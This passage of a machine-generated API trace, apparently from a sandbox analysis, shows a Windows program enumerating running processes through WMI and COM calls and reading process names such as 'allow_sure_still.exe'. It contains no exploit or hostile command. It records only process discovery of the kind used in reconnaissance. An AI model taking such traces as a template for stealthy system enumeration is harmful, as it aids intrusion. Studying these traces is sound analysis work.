This=0x56386e0, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x56386e0) returned 0x0 [0214.911] WbemDefPath:IUnknown:AddRef (This=0x56386e0) returned 0x3 [0214.911] WbemDefPath:IUnknown:Release (This=0x56386e0) returned 0x2 [0214.911] WbemDefPath:IWbemPath:SetText (This=0x56386e0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2804\"") returned 0x0 [0214.911] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.911] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.911] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.912] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.912] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.912] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.912] IWbemClassObject:Get (in: This=0x5636ad0, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269e464*=0, plFlavor=0x269e468*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="allow_sure_still.exe", varVal2=0x0), pType=0x269e464*=8, plFlavor=0x269e468*=0) returned 0x0 [0214.912] SysStringByteLen (bstr="allow_sure_still.exe") returned 0x28 [0214.912] SysStringByteLen (bstr="allow_sure_still.exe") returned 0x28 [0214.912] IWbemClassObject:Get (in: This=0x5636ad0, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269e464*=8, plFlavor=0x269e468*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="allow_sure_still.exe", varVal2=0x0), pType=0x269e464*=8, plFlavor=0x269e468*=0) returned 0x0 [0214.912] SysStringByteLen (bstr="allow_sure_still.exe") returned 0x28 [0214.912] SysStringByteLen (bstr="allow_sure_still.exe") returned 0x28 [0214.912] CoTaskMemAlloc (cb=0x4) returned 0x56324a8 [0214.912] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x56324a8, puReturned=0x267acc0 | out: apObjects=0x56324a8*=0x5636c68, puReturned=0x267acc0*=0x1) returned 0x0 [0214.949] IUnknown:QueryInterface (in: This=0x5636c68, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x5636c68) returned 0x0 [0214.949] IUnknown:QueryInterface (in: This=0x5636c68, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.949] IUnknown:QueryInterface (in: This=0x5636c68, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.950] IUnknown:AddRef (This=0x5636c68) returned 0x3 [0214.950] IUnknown:QueryInterface (in: This=0x5636c68, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.950] IUnknown:QueryInterface (in: This=0x5636c68, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.950] IUnknown:QueryInterface (in: This=0x5636c68, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x5636c6c) returned 0x0 [0214.950] IMarshal:GetUnmarshalClass (in: This=0x5636c6c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.950] IUnknown:Release (This=0x5636c6c) returned 0x3 [0214.950] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.950] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.950] IUnknown:QueryInterface (in: This=0x5636c68, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.950] IUnknown:Release (This=0x5636c68) returned 0x2 [0214.951] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.951] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.951] IUnknown:QueryInterface (in: This=0x5636c68, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x5636c68) returned 0x0 [0214.951] IUnknown:AddRef (This=0x5636c68) returned 0x4 [0214.951] IUnknown:Release (This=0x5636c68) returned 0x3 [0214.951] IUnknown:Release (This=0x5636c68) returned 0x2 [0214.951] CoTaskMemFree (pv=0x56324a8) [0214.951] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.951] IUnknown:AddRef (This=0x5636c68) returned 0x3 [0214.951] IWbemClassObject:Get (in: This=0x5636c68, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.951] IWbemClassObject:Get (in: This=0x5636c68, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2608\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.951] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2608\"") returned 0x66 [0214.951] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2608\"") returned 0x66 [0214.952] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.952] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.952] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.952] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.953] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x56324a8) returned 0x0 [0214.953] WbemDefPath:IUnknown:QueryInterface (in: This=0x56324a8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.953] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56324a8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x56387c0) returned 0x0 [0214.953] WbemDefPath:IUnknown:Release (This=0x56324a8) returned 0x0 [0214.953] WbemDefPath:IUnknown:QueryInterface (in: This=0x56387c0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x56387c0) returned 0x0 [0214.953] WbemDefPath:IUnknown:QueryInterface (in: This=0x56387c0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.954] WbemDefPath:IUnknown:AddRef (This=0x56387c0) returned 0x3 [0214.954] WbemDefPath:IUnknown:QueryInterface (in: This=0x56387c0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.954] WbemDefPath:IUnknown:QueryInterface (in: This=0x56387c0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.954] WbemDefPath:IUnknown:QueryInterface (in: This=0x56387c0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x56324b8) returned 0x0 [0214.954] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56324b8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.954] WbemDefPath:IUnknown:Release (This=0x56324b8) returned 0x3 [0214.954] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.954] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.954] WbemDefPath:IUnknown:QueryInterface (in: This=0x56387c0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.954] WbemDefPath:IUnknown:Release (This=0x56387c0) returned 0x2 [0214.954] WbemDefPath:IUnknown:Release (This=0x56387c0) returned 0x1 [0214.954] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.954] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.954] WbemDefPath:IUnknown:QueryInterface (in: This=0x56387c0, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x56387c0) returned 0x0 [0214.954] WbemDefPath:IUnknown:AddRef (This=0x56387c0) returned 0x3 [0214.954] WbemDefPath:IUnknown:Release (This=0x56387c0) returned 0x2 [0214.954] WbemDefPath:IWbemPath:SetText (This=0x56387c0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2608\"") returned 0x0 [0214.954] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.954] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.954] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.954] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.954] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.954] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.955] IWbemClassObject:Get (in: This=0x5636c68, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269ed04*=0, plFlavor=0x269ed08*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="store.exe", varVal2=0x0), pType=0x269ed04*=8, plFlavor=0x269ed08*=0) returned 0x0 [0214.955] SysStringByteLen (bstr="store.exe") returned 0x12 [0214.955] SysStringByteLen (bstr="store.exe") returned 0x12 [0214.955] IWbemClassObject:Get (in: This=0x5636c68, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269ed04*=8, plFlavor=0x269ed08*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="store.exe", varVal2=0x0), pType=0x269ed04*=8, plFlavor=0x269ed08*=0) returned 0x0 [0214.955] SysStringByteLen (bstr="store.exe") returned 0x12 [0214.955] SysStringByteLen (bstr="store.exe") returned 0x12 [0214.955] CoTaskMemAlloc (cb=0x4) returned 0x56324e8 [0214.955] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x56324e8, puReturned=0x267acc0 | out: apObjects=0x56324e8*=0x5636e00, puReturned=0x267acc0*=0x1) returned 0x0 [0214.958] IUnknown:QueryInterface (in: This=0x5636e00, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x5636e00) returned 0x0 [0214.958] IUnknown:QueryInterface (in: This=0x5636e00, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.958] IUnknown:QueryInterface (in: This=0x5636e00, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.959] IUnknown:AddRef (This=0x5636e00) returned 0x3 [0214.959] IUnknown:QueryInterface (in: This=0x5636e00, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.959] IUnknown:QueryInterface (in: This=0x5636e00, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.959] IUnknown:QueryInterface (in: This=0x5636e00, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x5636e04) returned 0x0 [0214.959] IMarshal:GetUnmarshalClass (in: This=0x5636e04, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.959] IUnknown:Release (This=0x5636e04) returned 0x3 [0214.959] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.959] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.959] IUnknown:QueryInterface (in: This=0x5636e00, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.959] IUnknown:Release (This=0x5636e00) returned 0x2 [0214.959] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.959] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.959] IUnknown:QueryInterface (in: This=0x5636e00, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x5636e00) returned 0x0 [0214.959] IUnknown:AddRef (This=0x5636e00) returned 0x4 [0214.959] IUnknown:Release (This=0x5636e00) returned 0x3 [0214.959] IUnknown:Release (This=0x5636e00) returned 0x2 [0214.959] CoTaskMemFree (pv=0x56324e8) [0214.960] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.960] IUnknown:AddRef (This=0x5636e00) returned 0x3 [0214.960] IWbemClassObject:Get (in: This=0x5636e00, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.960] IWbemClassObject:Get (in: This=0x5636e00, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2944\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.960] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2944\"") returned 0x66 [0214.960] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2944\"") returned 0x66 [0214.960] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.960] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.960] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.960] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.961] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x56324e8) returned 0x0 [0214.961] WbemDefPath:IUnknown:QueryInterface (in: This=0x56324e8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.961] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56324e8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x56388a0) returned 0x0 [0214.961] WbemDefPath:IUnknown:Release (This=0x56324e8) returned 0x0 [0214.961] WbemDefPath:IUnknown:QueryInterface (in: This=0x56388a0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x56388a0) returned 0x0 [0214.962] WbemDefPath:IUnknown:QueryInterface (in: This=0x56388a0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.962] WbemDefPath:IUnknown:AddRef (This=0x56388a0) returned 0x3 [0214.962] WbemDefPath:IUnknown:QueryInterface (in: This=0x56388a0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.962] WbemDefPath:IUnknown:QueryInterface (in: This=0x56388a0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.962] WbemDefPath:IUnknown:QueryInterface (in: This=0x56388a0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x56324f8) returned 0x0 [0214.962] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56324f8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.962] WbemDefPath:IUnknown:Release (This=0x56324f8) returned 0x3 [0214.962] 